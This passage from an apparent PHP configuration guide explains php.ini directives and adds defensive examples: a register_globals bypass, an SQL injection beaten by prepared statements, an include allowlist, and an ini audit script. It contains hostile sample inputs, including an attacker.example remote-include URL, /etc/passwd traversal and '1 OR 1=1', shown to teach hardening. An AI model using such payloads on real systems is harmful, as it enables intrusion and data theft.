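// Vulnerable pattern: $authorized is assigned only on the success path, so a
// request carrying ?authorized=1 has already set it before the test runs.
if (isset($_GET['user'], $_GET['pass'])
    && check_credentials((string) $_GET['user'], (string) $_GET['pass'])) {
    $authorized = true;
}
echo 'register_globals style: ', !empty($authorized) ? 'GRANTED' : 'denied', "\n";

// Hardened pattern: every variable the decision depends on is initialised, and
// input is read only from the superglobal it is expected to arrive in.
function is_authorized(array $get): bool
{
    $authorized = false;
    if (isset($get['user'], $get['pass'])) {
        $authorized = check_credentials((string) $get['user'], (string) $get['pass']);
    }
    return $authorized;
}
echo 'superglobal style:      ', is_authorized($_GET) ? 'GRANTED' : 'denied', "\n";
```

With the first command line the emulated register_globals path grants access without a password while the hardened function denies it; with the second both grant it. The fix is not a directive at all: initialize what you rely on and read request data from $_GET, $_POST or $_COOKIE by name.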
register_long_arrays = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
This directive determines whether PHP continues to register the various input arrays (ENVIRONMENT, GET, POST, COOKIE, SERVER) under their deprecated long names, such as $HTTP_GET_VARS and $HTTP_POST_VARS, alongside the $_GET, $_POST, and similar superglobals. Disabling this directive is recommended for performance reasons, since every request otherwise copies each input array twice.
Note: The register_long_arrays directive was deprecated in PHP 5.3 and removed in PHP 5.4.
register_argc_argv = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
Passing in variable information via the GET method is analogous to passing arguments to an executable. Many languages process such arguments in terms of argc and argv: argc is the argument count, and argv is an indexed array containing the arguments. If you would like to declare the variables $argc and $argv and mimic this functionality, enable register_argc_argv. In the CLI SAPI the directive is always on and the variables hold the command-line arguments; in a web SAPI, enabling it makes PHP split the query string on + and expose the pieces in $_SERVER['argv'], which is one more route by which request data reaches a script.
post_max_size = integerM
Scope: PHP_INI_SYSTEM; Default value: 8M
Of the two methods for passing data between requests, POST is better equipped to transport large amounts, such as what might be sent via a Web form. For both security and performance reasons you should cap how much data can be sent to a PHP script in one request; post_max_size does that for the entire POST body, file uploads included, so it must be at least as large as upload_max_filesize. A request that exceeds the limit is not rejected with an error: it arrives with $_POST and $_FILES empty (and a warning in the log), so a script should treat an empty POST with a large Content-Length as a failed submission rather than as a blank form.
WORKING WITH SINGLE AND DOUBLE QUOTES
Quotes, both of the single and double variety, have long played a special role in programming. Because they are used both as string delimiters and in written language, a program needs a way to tell the two apart. The solution is simple: escape any quote mark not intended to delimit the string. If you don’t, unexpected errors occur. Consider the following:
$sentence = "John said, "I love racing cars!"";
Which quote marks are intended to delimit the string, and which delimit John’s utterance? PHP doesn’t know, unless the inner quote marks are escaped, like this:
$sentence = "John said, \"I love racing cars!\"";
Automatically prefixing quote marks (along with backslashes and NUL bytes) in incoming request data with a backslash is what PHP calls magic quotes. It could be done automatically, by enabling the directive magic_quotes_gpc (introduced in this section), or manually and precisely, by calling addslashes() and stripslashes() where needed. The manual approach is the one to use, because it leaves the application in control of which values are escaped and for which destination; only when you are running an application that expects the automatic escaping should you enable it. Keep in mind that backslash escaping is a MySQL convention, not a general defense: it does nothing for values used in a numeric SQL context, for databases that escape by doubling the quote, or for HTML and shell output. The database driver’s own quoting function, or better a prepared statement, is the correct tool. Three parameters have long determined how PHP behaves in this regard: magic_quotes_gpc, magic_quotes_runtime, and magic_quotes_sybase. Because the feature was a long-standing source of confusion and false security, it was deprecated in PHP 5.3 and removed in PHP 5.4.
magic_quotes_gpc = On | Off
Scope: PHP_INI_PERDIR; Default value: On
This parameter determines whether magic quotes are applied to data arriving via GET, POST, and cookies. When enabled, every single quote, double quote, backslash, and NUL byte in that data is prefixed with a backslash before your script sees it. Because this happens unconditionally, code that does its own escaping (or that never sends the value to a database at all) ends up with doubled backslashes, and because the escaping is MySQL-style it is no help for a database that escapes differently or for a value used in a numeric context. Being a per-directory setting, it can also be switched on or off by a .htaccess file, so do not assume the php.ini value is the one in effect.
magic_quotes_runtime = On | Off
Scope: PHP_INI_ALL; Default value: Off
Enabling this parameter results in the automatic escaping (using a backslash) of any quote marks located within data returned from an external resource, such as a database or text file.
magic_quotes_sybase = On | Off
Scope: PHP_INI_ALL; Default value: Off
This parameter matters only when magic_quotes_gpc or magic_quotes_runtime is enabled. If magic_quotes_sybase is on, single quotes are escaped by doubling them (' becomes '') rather than with a backslash, and no other characters are touched; this matches Sybase and standard SQL string literals, which do not recognize a backslash as an escape character. Note that the setting replaces the behavior of magic_quotes_gpc rather than adding to it.
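The sidebar above and the magic_quotes_sybase discussion both come down to one point: escaping characters is database-specific and cannot be bolted on globally. The following example, added here and not part of the book, strips magic quotes once at the top of the request on an old interpreter, then shows a backslash-escaped lookup being bypassed in a numeric context while a prepared statement is not. It uses an in-memory SQLite database through pdo_sqlite; the table, rows and attacker input are constructed for the demo:

```php
<?php
declare(strict_types=1);

// Added example, not code from the book.

// On PHP older than 5.4, undo magic quotes once at the top of the request so
// the rest of the code sees exactly the bytes the client sent. Escaping is then
// applied only where it belongs: at the database boundary.
function strip_magic_quotes(array $data): array
{
    foreach ($data as $key => $value) {
        $data[$key] = is_array($value)
            ? strip_magic_quotes($value)
            : stripslashes((string) $value);
    }
    return $data;
}
if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
    $_GET    = strip_magic_quotes($_GET);
    $_POST   = strip_magic_quotes($_POST);
    $_COOKIE = strip_magic_quotes($_COOKIE);
}

// Constructed demo database: two users in an in-memory SQLite table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO users (id, name) VALUES (1, 'gilmore'), (2, 'sharp')");

// Backslash escaping (what magic_quotes_gpc would have done): there is no quote
// to escape in a numeric context, so the injected OR survives and the query
// returns every row.
function lookup_escaped(PDO $db, string $id): array
{
    $sql = 'SELECT name FROM users WHERE id = ' . addslashes($id);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Prepared statement: the value is bound as data, never parsed as SQL, so the
// same input matches no row.
function lookup_bound(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT name FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$attacker = '1 OR 1=1';   // constructed hostile input
print_r(lookup_escaped($db, $attacker));
print_r(lookup_bound($db, $attacker));
print_r(lookup_bound($db, '2'));
```

SQLite is a useful test bed here for a second reason: like Sybase and standard SQL it escapes a quote by doubling it, so a backslash-escaped string literal that MySQL would accept is a syntax error for it. A prepared statement sidesteps both problems because the driver never has to guess the server’s quoting rules.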
auto_prepend_file = string
Scope: PHP_INI_PERDIR; Default value: NULL
Creating page header templates or including code libraries before a PHP script is executed is most commonly done using the include() or require() function. You can automate this process and forgo those calls within your scripts by assigning the file name and corresponding path to the auto_prepend_file directive. Because the directive is honored per directory, a .htaccess file (under mod_php) or a .user.ini file (under CGI/FastCGI) in a writable directory can point it at an attacker’s file, which then runs before every script on the site; this is a well-known persistence technique, so keep web-writable directories free of such files and check the effective value in phpinfo() or ini_get_all() output when you audit a host.
auto_append_file = string
Scope: PHP_INI_PERDIR; Default value: NULL
Automatically inserting footer templates after a PHP script is executed is most commonly done using the include() or require() functions. You can automate this process and forgo those calls within your scripts by assigning the template file name and corresponding path to the auto_append_file directive. The same per-directory override caveat as for auto_prepend_file applies.
default_mimetype = string
Scope: PHP_INI_ALL; Default value: text/html
MIME types offer a standard means for classifying file types on the Internet. You can serve any of these file types via PHP applications, the most common of which is text/html. If you’re using PHP in other fashions, however, such as a content generator for WML (Wireless Markup Language) applications, you need to adjust the MIME type accordingly. You can do so by modifying the default_mimetype directive.
default_charset = string
Scope: PHP_INI_ALL; Default value: iso-8859-1
As of version 4.0, PHP outputs a character encoding in the Content-Type header. In the versions covered here this is set to iso-8859-1 by default, which supports languages such as English, Spanish, German, Italian, and Portuguese, among others. If your application is geared toward languages such as Japanese, Chinese, or Hebrew, the default_charset directive lets you change the setting accordingly. Always declare a charset explicitly (UTF-8 is the sensible choice and became the default in PHP 5.6): a response without one leaves the browser to guess the encoding, and that guessing has been abused for cross-site scripting with encodings such as UTF-7.
always_populate_raw_post_data = On | Off
Scope: PHP_INI_PERDIR; Default value: Off
Enabling the always_populate_raw_post_data directive causes PHP to assign the raw, unparsed POST body to the variable $HTTP_RAW_POST_DATA even when the content type is one PHP already parses (application/x-www-form-urlencoded or multipart/form-data), and even when the form fields are empty. The same bytes can be read from the php://input stream for any non-multipart body without enabling anything, and that is the portable approach: the directive was deprecated in PHP 5.6 and removed in PHP 7.0. For example, suppose this directive is enabled and you create a form consisting of two text fields, one for the user’s name and another for the user’s e-mail address. In the resulting form action, you execute just one command:
echo $HTTP_RAW_POST_DATA;
Filling out neither field and clicking the Submit button results in the following output:
name=&email=
Filling out both fields and clicking the Submit button produces output similar to the following:
name=sharp&email=xyz@note.com
Paths and Directories
This section introduces directives that determine PHP’s default path settings. These paths are used for including libraries and extensions, as well as for determining user Web directories and Web document roots.
include_path = string
Scope: PHP_INI_ALL; Default value: NULL
The directories listed here are searched, in order, by include(), require(), fopen(), file(), readfile(), and file_get_contents() when they are given a relative path. On Unix, separate the entries with a colon, as shown in the following example:
include_path=".:/usr/local/include/php:/home/php"
If the directive is not set, PHP uses the value compiled into the binary (visible in the output of php -i). Be aware that the "." entry means the current working directory, so a relative include can resolve to a different file depending on where the process was started; prefer absolute entries and keep directories the web server can write to off the path.
Note that on Windows, the entries are separated by semicolons, backward slashes are used in lieu of forward slashes, and the drive letter prefaces the path:
include_path=".;C:\php6\includes"
doc_root = string
Scope: PHP_INI_SYSTEM; Default value: NULL
This parameter determines the root directory from which all PHP scripts will be served. It is consulted only if it is not empty.
user_dir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
The user_dir directive specifies the absolute directory PHP uses when opening files using the /~username convention. For example, when user_dir is set to /home/users and a user attempts to open the file ~gilmore/collections/books.txt, PHP knows that the absolute path is /home/users/gilmore/collections/books.txt.
extension_dir = string
Scope: PHP_INI_SYSTEM; Default value: ./
The extension_dir directive tells PHP where its loadable extensions (modules) are located. By default, this is set to ./, which means that the loadable extensions are located in the same directory as the executing script. In the Windows environment, if extension_dir is not set, it will default to C:\PHP-INSTALLATION-DIRECTORY\ext\. In the Linux environment, the exact location of this directory depends on several factors, although it’s quite likely that the location will be PHP-INSTALLATION-DIRECTORY/lib/php/extensions/no-debug-zts-RELEASE-BUILD-DATE/. Whatever the location, it must not be writable by the account the web server runs as: a file dropped there is native code that PHP will load into its own process.
enable_dl = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
The enable_dl directive determines whether scripts may call dl() to load a PHP extension at run time, that is, during a script’s execution. Because dl() loads arbitrary native code into the server process, it should be disabled on any shared or multi-tenant host; as of PHP 5.3 it is unavailable in most web SAPIs anyway and remains usable mainly from the command line.
Fopen Wrappers
This section contains five directives pertinent to the access and manipulation of remote files.
allow_url_fopen = On | Off
Scope: PHP_INI_ALL; Default value: On
Enabling allow_url_fopen lets the file functions (fopen(), file_get_contents(), and so on) open remote resources through the http://, https://, and ftp:// wrappers almost as if they were local files; writing is possible only where the wrapper supports it (FTP, not HTTP), and only if the remote server permits it. Since PHP 5.2 the include family is governed separately by allow_url_include, which is Off by default and should stay off: with it on, any include whose path an attacker can influence becomes remote code execution. Leave allow_url_fopen off as well unless the application genuinely fetches remote URLs, and never build a path or URL from request data.
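The allow_url_fopen and allow_url_include directives only change what a path can point at; the defense that actually holds is never letting request data choose the file. The following example, added here and not taken from the book, shows the vulnerable include shape in a comment and an allowlist-based replacement in code. The page files are created in a temporary directory for the demo, and the request values are constructed:

```php
<?php
declare(strict_types=1);

// Added example, not code from the book. Creates two "page" files in a temp
// directory so the demo runs stand-alone.
$base = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($base, 0700);
file_put_contents($base . '/home.php',  '<?php return "home page";');
file_put_contents($base . '/about.php', '<?php return "about page";');

// Vulnerable shape (shown, not executed):   include $_GET['page'] . '.php';
// With allow_url_include = On, ?page=http://attacker.example/x fetches and
// runs remote code. With it Off, ../ traversal and php:// wrappers still reach
// files that were never meant to be executed.

// Hardened: the request supplies a key, the code supplies the path.
function render_page(string $base, string $page): string
{
    static $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!isset($allowed[$page])) {
        return 'not found';            // unknown key: never touch the filesystem
    }
    $root = realpath($base);
    $path = realpath($base . '/' . $allowed[$page]);
    // Defence in depth: the resolved file must still live under $base.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return 'not found';
    }
    $result = include $path;           // the page file returns its content
    return (string) $result;
}

// Constructed request values: two legitimate keys and three hostile ones.
foreach (['home', 'about', '../../../etc/passwd',
          'http://attacker.example/shell.txt', 'php://input'] as $page) {
    printf("%-36s -> %s\n", $page, render_page($base, $page));
}

// Report the two directives that decide how far a bad include can reach.
echo 'allow_url_fopen=', var_export((bool) ini_get('allow_url_fopen'), true),
     ' allow_url_include=', var_export((bool) ini_get('allow_url_include'), true), "\n";

// Tidy up the demo files.
unlink($base . '/home.php');
unlink($base . '/about.php');
rmdir($base);
```

The allowlist makes the directive values irrelevant to this code path: only two fixed files can ever be included. The realpath() check is there for the day someone adds an entry to the map that contains a symlink or a relative component.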
from = string
Scope: PHP_INI_ALL; Default value: NULL
The name of the from directive is perhaps misleading, in that it sets the password (conventionally an e-mail address) rather than the identity that the ftp:// wrapper presents when it logs in anonymously. Therefore, if from is set like this
from = “xyz@note.com”
the username anonymous and the password xyz@note.com will be sent to the server when authentication is requested.
user_agent = string
Scope: PHP_INI_ALL; Default value: NULL
When PHP itself opens a remote URL, for example through file_get_contents() with allow_url_fopen enabled, the http wrapper sends a User-Agent header along with the request. This directive determines the value of that header.
default_socket_timeout = integer
Scope: PHP_INI_ALL; Default value: 60
This directive determines the time-out value of a socket-based stream, in seconds.
auto_detect_line_endings = On | Off
Scope: PHP_INI_ALL; Default value: Off
One never-ending source of developer frustration is the end-of-line (EOL) character, because different operating systems use different conventions. When auto_detect_line_endings is enabled, fgets() and file() also recognize the classic Macintosh convention (a bare carriage return) in addition to the Unix and Windows conventions they handle anyway. Detection costs a little performance, and the directive is deprecated as of PHP 8.1.
Dynamic Extensions
This section contains a single directive, extension.
extension = string
Scope: PHP_INI_ALL; Default value: NULL
The extension directive is used to dynamically load a particular module. On the Win32 operating system, a module might be loaded like this:
extension = php_java.dll
On Unix, it would be loaded like this:
extension = php_java.so
Keep in mind that on either operating system, simply uncommenting or adding this line doesn’t necessarily enable the relevant extension. You’ll also need to ensure that the appropriate software is installed on the operating system. For example, to enable Java support, you also need to install the JDK.
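Several of the directives in this section (register_globals, the magic_quotes family, allow_url_fopen, allow_url_include, enable_dl, auto_prepend_file and auto_append_file) are the ones an auditor checks first, and the Scope line above each one says whether a .htaccess or .user.ini file could have changed it. The following script, added here and not part of the book, reports the effective value of each and which scope it can be set from. The baseline values are this example’s hardening assumptions, not PHP defaults; run it through the same SAPI as the application (a page behind the web server, not only the CLI), because each SAPI may read a different php.ini:

```php
<?php
declare(strict_types=1);

// Added example, not code from the book.

// Expected hardened value per directive ('0' = Off, '' = unset). These are the
// example's assumptions; adjust allow_url_fopen if the application needs it.
const BASELINE = [
    'register_globals'     => '0',
    'register_long_arrays' => '0',
    'magic_quotes_gpc'     => '0',
    'magic_quotes_runtime' => '0',
    'allow_url_fopen'      => '0',
    'allow_url_include'    => '0',
    'enable_dl'            => '0',
    'auto_prepend_file'    => '',
    'auto_append_file'     => '',
];

// ini_get_all() reports 'access' as a bitmask: 1 = PHP_INI_USER,
// 2 = PHP_INI_PERDIR, 4 = PHP_INI_SYSTEM (7 = PHP_INI_ALL). Anything with the
// PERDIR bit can be set from .htaccess (mod_php) or .user.ini (CGI/FastCGI),
// so a writable document root lets an attacker override it.
function access_label(int $access): string
{
    $names = [];
    if ($access & 1) { $names[] = 'USER'; }
    if ($access & 2) { $names[] = 'PERDIR'; }
    if ($access & 4) { $names[] = 'SYSTEM'; }
    return implode('|', $names);
}

// On/Off directives come back as "1"/"" or "On"/"Off" depending on how they
// were written in the ini file; reduce them to '1' or '0' for comparison.
function normalise_bool(string $value): string
{
    $v = strtolower(trim($value));
    if (in_array($v, ['1', 'on', 'yes', 'true'], true))         { return '1'; }
    if (in_array($v, ['', '0', 'off', 'no', 'false'], true))    { return '0'; }
    return $value;
}

// Compare the effective (local) value of each directive with the baseline.
// A directive that is absent was removed from this PHP version, which is fine.
function audit_ini(array $baseline, array $all): array
{
    $report = [];
    foreach ($baseline as $name => $expected) {
        if (!isset($all[$name])) {
            $report[$name] = ['status' => 'absent', 'value' => null, 'access' => ''];
            continue;
        }
        $value  = (string) $all[$name]['local_value'];
        $isBool = in_array($expected, ['0', '1'], true);
        $actual = $isBool ? normalise_bool($value) : $value;
        $report[$name] = [
            'status' => $actual === $expected ? 'ok' : 'WEAK',
            'value'  => $value,
            'access' => access_label((int) $all[$name]['access']),
        ];
    }
    return $report;
}

foreach (audit_ini(BASELINE, ini_get_all(null, true)) as $name => $r) {
    printf("%-22s %-6s value=%-12s settable_from=%s\n",
           $name, $r['status'], var_export($r['value'], true), $r['access']);
}
```

A WEAK line with PERDIR in its scope column deserves a second look even when php.ini is correct, because the value in force may have come from a file the web server can write. Directives reported as absent have been removed from the running interpreter and cannot be misconfigured.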